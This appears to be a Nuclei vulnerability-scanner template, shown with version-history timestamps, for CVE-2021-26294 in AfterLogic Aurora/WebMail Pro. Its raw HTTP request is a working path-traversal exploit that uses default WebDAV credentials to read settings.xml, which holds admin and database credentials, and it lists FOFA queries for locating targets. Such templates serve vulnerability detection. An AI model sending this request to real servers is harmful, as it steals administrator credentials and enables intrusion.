nuclei-templates/http/cves/2021/CVE-2021-26294.yaml

58 lines
2.0 KiB
YAML
Raw Normal View History

2023-11-24 00:43:23 +00:00
id: CVE-2021-26294
info:
2023-11-25 10:28:09 +00:00
name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure
2023-11-24 00:43:23 +00:00
author: johnk3r
severity: high
2023-11-25 10:28:09 +00:00
description: |
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and its the predefined password “caldav_public_user” allows the attacker to read all files under the web root.
2023-11-24 00:43:23 +00:00
reference:
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-26294
- https://github.com/Threekiii/Awesome-POC
- https://github.com/soosmile/POC
- https://github.com/tzwlhack/Vulnerability
2023-11-24 00:43:23 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-26294
cwe-id: CWE-22
2024-05-31 19:23:20 +00:00
epss-score: 0.21969
epss-percentile: 0.96457
2023-11-24 00:43:23 +00:00
cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:*
metadata:
2023-11-25 10:28:09 +00:00
verified: true
2023-12-05 09:50:33 +00:00
max-request: 1
vendor: afterlogic
product: aurora
fofa-query:
- "X-Server: AfterlogicDAVServer"
- "x-server: afterlogicdavserver"
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,afterlogic,exposure,AfterLogic
2023-11-24 00:43:23 +00:00
http:
2023-11-25 10:28:09 +00:00
- raw:
- |
GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
2023-11-24 00:43:23 +00:00
matchers-condition: and
matchers:
- type: word
2023-11-25 10:28:09 +00:00
part: body
2023-11-24 00:43:23 +00:00
words:
2023-11-25 10:28:09 +00:00
- "<AdminLogin>"
- "<AdminPassword>"
- "<DBHost>"
2023-11-24 00:43:23 +00:00
condition: and
2023-11-25 10:28:09 +00:00
- type: word
part: header
words:
- "application/octet-stream"
2023-11-24 00:43:23 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100db3b9605b9b091097884dfe82d70288e337eae54bbefb926139d41d9b7c4b4ce02206c41d93b1c185cd9ef06c7cf71cfacc86d805c0a37f4c07eabb337978225e142:922c64590222798bb761d5b6d8e72950